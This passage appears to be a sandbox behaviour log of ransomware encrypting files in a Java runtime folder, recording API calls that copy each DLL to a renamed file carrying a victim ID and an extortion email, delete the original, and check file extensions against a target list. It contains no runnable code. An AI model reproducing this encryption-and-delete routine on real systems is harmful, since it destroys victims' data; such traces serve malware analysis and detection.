Files\\Java\\jre1.8.0_144\\bin\\dt_socket.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\dt_socket.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0189.672] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\dt_socket.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\dt_socket.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x374 [0189.672] SetFilePointerEx (in: hFile=0x374, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x375fec0 | out: lpNewFilePointer=0x0) returned 1 [0189.672] SetFilePointerEx (in: hFile=0x374, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x375fec0 | out: lpNewFilePointer=0x0) returned 1 [0189.672] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\dt_socket.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\dt_socket.dll.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x398 [0189.673] GetLastError () returned 0x0 [0189.673] ReadFile (in: hFile=0x374, lpBuffer=0x415e020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x375fecc, lpOverlapped=0x0 | out: lpBuffer=0x415e020*, lpNumberOfBytesRead=0x375fecc*=0x6040, lpOverlapped=0x0) returned 1 [0190.626] WriteFile (in: hFile=0x398, lpBuffer=0x415e020*, nNumberOfBytesToWrite=0x6050, lpNumberOfBytesWritten=0x375fc94, lpOverlapped=0x0 | out: lpBuffer=0x415e020*, lpNumberOfBytesWritten=0x375fc94*=0x6050, lpOverlapped=0x0) returned 1 [0190.731] ReadFile (in: hFile=0x374, lpBuffer=0x415e020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x375fecc, lpOverlapped=0x0 | out: lpBuffer=0x415e020*, lpNumberOfBytesRead=0x375fecc*=0x0, lpOverlapped=0x0) returned 1 [0190.731] WriteFile (in: hFile=0x398, lpBuffer=0x415e020*, nNumberOfBytesToWrite=0xee, lpNumberOfBytesWritten=0x375fc94, lpOverlapped=0x0 | out: lpBuffer=0x415e020*, lpNumberOfBytesWritten=0x375fc94*=0xee, lpOverlapped=0x0) returned 1 [0190.731] SetEndOfFile (hFile=0x398) returned 1 [0190.732] CloseHandle (hObject=0x398) returned 1 [0190.732] SetFilePointerEx (in: hFile=0x374, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x375fec0 | out: lpNewFilePointer=0x0) returned 1 [0190.732] SetEndOfFile (hFile=0x374) returned 1 [0190.733] CloseHandle (hObject=0x374) returned 1 [0190.733] SetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\dt_socket.dll.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0190.916] DeleteFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\dt_socket.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\dt_socket.dll")) returned 1 [0190.916] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\dt_socket.dll") returned 52 [0190.916] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\dt_socket.dll") returned 52 [0190.916] lstrlenW (lpString=".doc") returned 4 [0190.917] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0190.917] lstrlenW (lpString=".docx") returned 5 [0190.917] lstrcmpiW (lpString1=".docx", lpString2="t.dll") returned -1 [0190.917] lstrlenW (lpString=".pdf") returned 4 [0190.917] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0190.917] lstrlenW (lpString=".xls") returned 4 [0190.917] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0190.917] lstrlenW (lpString=".xlsx") returned 5 [0190.917] lstrcmpiW (lpString1=".xlsx", lpString2="t.dll") returned -1 [0190.917] lstrlenW (lpString=".ppt") returned 4 [0190.917] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0190.917] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\dt_socket.dll") returned 52 [0190.917] lstrlenW (lpString=".zip") returned 4 [0190.917] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0190.917] lstrlenW (lpString=".rar") returned 4 [0190.917] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0190.917] lstrlenW (lpString=".bz2") returned 4 [0190.917] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0190.917] lstrlenW (lpString=".7z") returned 3 [0190.917] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0190.917] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\dt_socket.dll") returned 52 [0190.917] lstrlenW (lpString=".dbf") returned 4 [0190.917] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0190.917] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\dt_socket.dll") returned 52 [0190.917] lstrlenW (lpString=".1cd") returned 4 [0190.917] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0190.917] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\dt_socket.dll") returned 52 [0190.917] lstrlenW (lpString=".jpg") returned 4 [0190.917] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0190.918] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\dt_socket.dll") returned 52 [0190.918] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\dt_socket.dll") returned 52 [0190.918] lstrlenW (lpString=".doc") returned 4 [0190.918] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0190.918] lstrlenW (lpString=".docx") returned 5 [0190.918] lstrcmpiW (lpString1=".docx", lpString2="t.dll") returned -1 [0190.918] lstrlenW (lpString=".pdf") returned 4 [0190.918] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0190.918] lstrlenW (lpString=".xls") returned 4 [0190.918] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0190.918] lstrlenW (lpString=".xlsx") returned 5 [0190.918] lstrcmpiW (lpString1=".xlsx", lpString2="t.dll") returned -1 [0190.918] lstrlenW (lpString=".ppt") returned 4 [0190.918] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0190.918] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\dt_socket.dll") returned 52 [0190.918] lstrlenW (lpString=".zip") returned 4 [0190.918] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0190.918] lstrlenW (lpString=".rar") returned 4 [0190.918] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0190.918] lstrlenW (lpString=".bz2") returned 4 [0190.918] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0190.918] lstrlenW (lpString=".7z") returned 3 [0190.918] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0190.918] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\dt_socket.dll") returned 52 [0190.918] lstrlenW (lpString=".dbf") returned 4 [0190.918] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0190.918] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\dt_socket.dll") returned 52 [0190.918] lstrlenW (lpString=".1cd") returned 4 [0190.918] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0190.918] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\dt_socket.dll") returned 52 [0190.918] lstrlenW (lpString=".jpg") returned 4 [0190.919] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0190.919] lstrcmpiW (lpString1=".dll", lpString2=".bat") returned 1 [0190.919] lstrlenW (lpString="fontmanager.dll") returned 15 [0190.919] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\fontmanager.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\fontmanager.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x378 [0190.919] GetFileSizeEx (in: hFile=0x378, lpFileSize=0x375ff14 | out: lpFileSize=0x375ff14*=274496) returned 1 [0190.919] CloseHandle (hObject=0x378) returned 1 [0190.920] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\fontmanager.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\fontmanager.dll")) returned 0x20 [0190.920] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\fontmanager.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\fontmanager.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0190.920] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\fontmanager.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\fontmanager.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x378 [0190.920] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x375fec0 | out: lpNewFilePointer=0x0) returned 1 [0190.920] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x375fec0 | out: lpNewFilePointer=0x0) returned 1 [0190.920] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\fontmanager.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\fontmanager.dll.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c [0190.921] GetLastError () returned 0x0 [0190.921] ReadFile (in: hFile=0x378, lpBuffer=0x415e020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x375fecc, lpOverlapped=0x0 | out: lpBuffer=0x415e020*, lpNumberOfBytesRead=0x375fecc*=0x43040, lpOverlapped=0x0) returned 1 [0194.406] WriteFile (in: hFile=0x37c, lpBuffer=0x415e020*, nNumberOfBytesToWrite=0x43050, lpNumberOfBytesWritten=0x375fc94, lpOverlapped=0x0 | out: lpBuffer=0x415e020*, lpNumberOfBytesWritten=0x375fc94*=0x43050, lpOverlapped=0x0) returned 1 [0195.844] ReadFile (in: hFile=0x378, lpBuffer=0x415e020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x375fecc, lpOverlapped=0x0 | out: lpBuffer=0x415e020*, lpNumberOfBytesRead=0x375fecc*=0x0, lpOverlapped=0x0) returned 1 [0195.844] WriteFile (in: hFile=0x37c, lpBuffer=0x415e020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x375fc94, lpOverlapped=0x0 | out: lpBuffer=0x415e020*, lpNumberOfBytesWritten=0x375fc94*=0xf2, lpOverlapped=0x0) returned 1 [0195.844] SetEndOfFile (hFile=0x37c) returned 1 [0195.844] CloseHandle (hObject=0x37c) returned 1 [0195.845] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x375fec0 | out: lpNewFilePointer=0x0) returned 1 [0195.845] SetEndOfFile (hFile=0x378) returned 1 [0195.848] CloseHandle (hObject=0x378) returned 1 [0195.848] SetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\fontmanager.dll.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0195.848] DeleteFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\fontmanager.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\fontmanager.dll")) returned 1 [0195.848] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\fontmanager.dll") returned 54 [0195.848] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\fontmanager.dll") returned 54 [0195.848] lstrlenW (lpString=".doc") returned 4 [0195.848] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0195.848] lstrlenW (lpString=".docx") returned 5 [0195.848] lstrcmpiW (lpString1=".docx", lpString2="r.dll") returned -1 [0195.848] lstrlenW (lpString=".pdf") returned 4 [0195.849] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0195.849] lstrlenW (lpString=".xls") returned 4 [0195.849] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0195.849] lstrlenW (lpString=".xlsx") returned 5 [0195.849] lstrcmpiW (lpString1=".xlsx", lpString2="r.dll") returned -1 [0195.849] lstrlenW (lpString=".ppt") returned 4 [0195.849] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0195.849] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\fontmanager.dll") returned 54 [0195.849] lstrlenW (lpString=".zip") returned 4 [0195.849] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0195.849] lstrlenW (lpString=".rar") returned 4 [0195.849] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0195.849] lstrlenW (lpString=".bz2") returned 4 [0195.849] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0195.849] lstrlenW (lpString=".7z") returned 3 [0195.849] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0195.849] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\fontmanager.dll") returned 54 [0195.849] lstrlenW (lpString=".dbf") returned 4 [0195.849] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0195.849] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\fontmanager.dll") returned 54 [0195.849] lstrlenW (lpString=".1cd") returned 4 [0195.849] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0195.849] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\fontmanager.dll") returned 54 [0195.849] lstrlenW (lpString=".jpg") returned 4 [0195.849] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0195.849] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\fontmanager.dll") returned 54 [0195.849] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\fontmanager.dll") returned 54 [0195.849] lstrlenW (lpString=".doc") returned 4 [0195.849] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0195.849] lstrlenW (lpString=".docx") returned 5 [0195.850] lstrcmpiW (lpString1=".docx", lpString2="r.dll") returned -1 [0195.850] lstrlenW (lpString=".pdf") returned 4 [0195.850] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0195.850] lstrlenW (lpString=".xls") returned 4 [0195.850] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0195.850] lstrlenW (lpString=".xlsx") returned 5 [0195.850] lstrcmpiW (lpString1=".xlsx", lpString2="r.dll") returned -1 [0195.850] lstrlenW (lpString=".ppt") returned 4 [0195.850] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0195.850] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\fontmanager.dll") returned 54 [0195.850] lstrlenW (lpString=".zip") returned 4 [0195.850] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0195.850] lstrlenW (lpString=".rar") returned 4 [0195.850] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0195.850] lstrlenW (lpString=".bz2") returned 4 [0195.850] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0195.850] lstrlenW (lpString=".7z") returned 3 [0195.850] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0195.850] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\fontmanager.dll") returned 54 [0195.850] lstrlenW (lpString=".dbf") returned 4 [0195.850] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0195.851] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\fontmanager.dll") returned 54 [0195.851] lstrlenW (lpString=".1cd") returned 4 [0195.851] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0195.851] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\fontmanager.dll") returned 54 [0195.851] lstrlenW (lpString=".jpg") returned 4 [0195.851] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0195.851] lstrcmpiW (lpString1=".dll", lpString2=".bat") returned 1 [0195.851] lstrlenW (lpString="fxplugins.dll") returned 13 [0195.851] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\fxplugins.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\fxplugins.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x378 [0195.851] GetFileSizeEx (in: hFile=0x378, lpFileSize=0x375ff14 | out: lpFileSize=0x375ff14*=186944) returned 1 [0195.851] CloseHandle (hObject=0x378) returned 1 [0195.851] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\fxplugins.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\fxplugins.dll")) returned 0x20 [0195.852] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\fxplugins.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\fxplugins.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0195.852] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\fxplugins.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\fxplugins.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x378 [0195.852] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x375fec0 | out: lpNewFilePointer=0x0) returned 1 [0195.852] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x375fec0 | out: lpNewFilePointer=0x0) returned 1 [0195.852] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\fxplugins.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\fxplugins.dll.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c [0195.852] GetLastError () returned 0x0 [0195.852] ReadFile (in: hFile=0x378, lpBuffer=0x415e020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x375fecc, lpOverlapped=0x0 | out: lpBuffer=0x415e020*, lpNumberOfBytesRead=0x375fecc*=0x2da40, lpOverlapped=0x0) returned 1 [0196.087] WriteFile (in: hFile=0x37c, lpBuffer=0x415e020*, nNumberOfBytesToWrite=0x2da50, lpNumberOfBytesWritten=0x375fc94, lpOverlapped=0x0 | out: lpBuffer=0x415e020*, lpNumberOfBytesWritten=0x375fc94*=0x2da50, lpOverlapped=0x0) returned 1 [0196.229] ReadFile (in: hFile=0x378, lpBuffer=0x415e020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x375fecc, lpOverlapped=0x0 | out: lpBuffer=0x415e020*, lpNumberOfBytesRead=0x375fecc*=0x0, lpOverlapped=0x0) returned 1 [0196.229] WriteFile (in: hFile=0x37c, lpBuffer=0x415e020*, nNumberOfBytesToWrite=0xee, lpNumberOfBytesWritten=0x375fc94, lpOverlapped=0x0 | out: lpBuffer=0x415e020*, lpNumberOfBytesWritten=0x375fc94*=0xee, lpOverlapped=0x0) returned 1 [0196.229] SetEndOfFile (hFile=0x37c) returned 1 [0196.229] CloseHandle (hObject=0x37c) returned 1 [0196.229] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x375fec0 | out: lpNewFilePointer=0x0) returned 1 [0196.229] SetEndOfFile (hFile=0x378) returned 1 [0196.232] CloseHandle (hObject=0x378) returned 1 [0196.232] SetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\fxplugins.dll.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0196.232] DeleteFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\fxplugins.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\fxplugins.dll")) returned 1 [0196.233] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\fxplugins.dll") returned 52 [0196.233] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\fxplugins.dll") returned 52 [0196.233] lstrlenW (lpString=".doc") returned 4 [0196.233] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0196.233] lstrlenW (lpString=".docx") returned 5 [0196.233] lstrcmpiW (lpString1=".docx", lpString2="s.dll") returned -1 [0196.233] lstrlenW (lpString=".pdf") returned 4 [0196.233] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0196.233] lstrlenW (lpString=".xls") returned 4 [0196.233] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0196.233] lstrlenW (lpString=".xlsx") returned 5 [0196.233] lstrcmpiW (lpString1=".xlsx", lpString2="s.dll") returned -1 [0196.233] lstrlenW (lpString=".ppt") returned 4 [0196.233] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0196.233] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\fxplugins.dll") returned 52 [0196.233] lstrlenW (lpString=".zip") returned 4 [0196.233] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0196.233] lstrlenW (lpString=".rar") returned 4 [0196.233] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0196.233] lstrlenW (lpString=".bz2") returned 4 [0196.233] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0196.233] lstrlenW (lpString=".7z") returned 3 [0196.233] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0196.234] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\fxplugins.dll") returned 52 [0196.234] lstrlenW (lpString=".dbf") returned 4 [0196.234] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0196.234] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\fxplugins.dll") returned 52 [0196.234] lstrlenW (lpString=".1cd") returned 4 [0196.234] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0196.234] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\fxplugins.dll") returned 52 [0196.234] lstrlenW (lpString=".jpg") returned 4 [0196.234] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0196.234] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\fxplugins.dll") returned 52 [0196.234] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\fxplugins.dll") returned 52 [0196.234] lstrlenW (lpString=".doc") returned 4 [0196.234] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0196.234] lstrlenW (lpString=".docx") returned 5 [0196.234] lstrcmpiW (lpString1=".docx", lpString2="s.dll") returned -1 [0196.234] lstrlenW (lpString=".pdf") returned 4 [0196.234] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0196.234] lstrlenW (lpString=".xls") returned 4 [0196.234] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0196.234] lstrlenW (lpString=".xlsx") returned 5 [0196.234] lstrcmpiW (lpString1=".xlsx", lpString2="s.dll") returned -1 [0196.234] lstrlenW (lpString=".ppt") returned 4 [0196.234] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0196.234] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\fxplugins.dll") returned 52 [0196.234] lstrlenW (lpString=".zip") returned 4 [0196.234] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0196.234] lstrlenW (lpString=".rar") returned 4 [0196.235] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0196.235] lstrlenW (lpString=".bz2") returned 4 [0196.235] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0196.235] lstrlenW (lpString=".7z") returned 3 [0196.235] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0196.235] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\fxplugins.dll") returned 52 [0196.235] lstrlenW (lpString=".dbf") returned 4 [0196.235] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0196.235] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\fxplugins.dll") returned 52 [0196.235] lstrlenW (lpString=".1cd") returned 4 [0196.235] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0196.235] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\fxplugins.dll") returned 52 [0196.235] lstrlenW (lpString=".jpg") returned 4 [0196.235] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0196.235] lstrcmpiW (lpString1=".dll", lpString2=".bat") returned 1 [0196.235] lstrlenW (lpString="gstreamer-lite.dll") returned 18 [0196.235] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\gstreamer-lite.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\gstreamer-lite.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x378 [0196.236] GetFileSizeEx (in: hFile=0x378, lpFileSize=0x375ff14 | out: lpFileSize=0x375ff14*=619584) returned 1 [0196.236] CloseHandle (hObject=0x378) returned 1 [0196.236] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\gstreamer-lite.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\gstreamer-lite.dll")) returned 0x20 [0196.236] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\gstreamer-lite.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\gstreamer-lite.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0196.236] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\gstreamer-lite.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\gstreamer-lite.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x378 [0196.236] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x375fec0 | out: lpNewFilePointer=0x0) returned 1 [0196.236] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x375fec0 | out: lpNewFilePointer=0x0) returned 1 [0196.236] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\gstreamer-lite.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\gstreamer-lite.dll.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c [0196.237] GetLastError () returned 0x0 [0196.237] ReadFile (in: hFile=0x378, lpBuffer=0x415e020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x375fecc, lpOverlapped=0x0 | out: lpBuffer=0x415e020*, lpNumberOfBytesRead=0x375fecc*=0x97440, lpOverlapped=0x0) returned 1 [0196.275] WriteFile (in: hFile=0x37c, 